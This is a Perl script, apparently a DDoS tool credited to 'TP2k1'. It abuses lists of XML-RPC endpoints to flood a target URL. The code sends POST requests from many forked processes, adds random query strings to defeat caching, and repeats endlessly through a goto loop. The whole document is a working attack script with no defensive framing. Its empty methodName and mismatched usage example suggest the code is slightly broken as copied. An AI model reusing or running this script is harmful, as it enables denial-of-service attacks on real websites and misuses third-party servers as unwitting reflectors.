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- #!/usr/bin/perl -w
- use List::Util qw(min max);
- use LWP::UserAgent;
- use HTTP::Request::Common;
- use Parallel::ForkManager;
- use vars qw( $PROG );
- ( $PROG = $0 ) =~ s/^.*[\/\\]//;
- if ( @ARGV == 0 ) {
- print "Usage: ./$PROG [TARGET] [THREADS] [LIST] [TIMEOUT]\nExample: ./$PROG 10000 xmlrpc.txt 10\nList Format: XMLRPC POST\nMade by TP2k1\n";
- exit;
- }
- my $max_processes = $ARGV[1];
- my $pm = Parallel::ForkManager->new($max_processes);
- my $count = 1;
- my $timeout = $ARGV[3];
- my $weblist = $ARGV[2];
- open my $handle, '<', $weblist;
- chomp(my @webservers = <$handle>);
- close $handle;
- repeat:
- for my $webservers (@webservers) {
- my @chars = ("a".."z", A..Z, 0..9);
- my $random = join '', map { @chars[rand @chars] } 1 .. 8;
- my $random2 = join '', map { @chars[rand @chars] } 1 .. 8;
- $count++;
- $max = max $count;
- my $pid = $pm->start and next;
- alarm($timeout);
- my($xmlrpc, $webpost) = split(' ', $webservers, 2);
- my $target = "$ARGV[0]?$random=$random2";
- my $userAgent = LWP::UserAgent->new(agent => 'perl post');
- my $message = "<methodCall><methodName></methodName><params><param><value><string>$target</string></value></param><param><value><string>$webpost</string></value></param></params></methodCall>";
- my $response = $userAgent->request(POST $xmlrpc,
- Content_Type => 'text/xml',
- Content => $message);
- print("\rRequests: $max ");
- $pm->finish;
- }
- $pm->wait_all_children;
- goto repeat;
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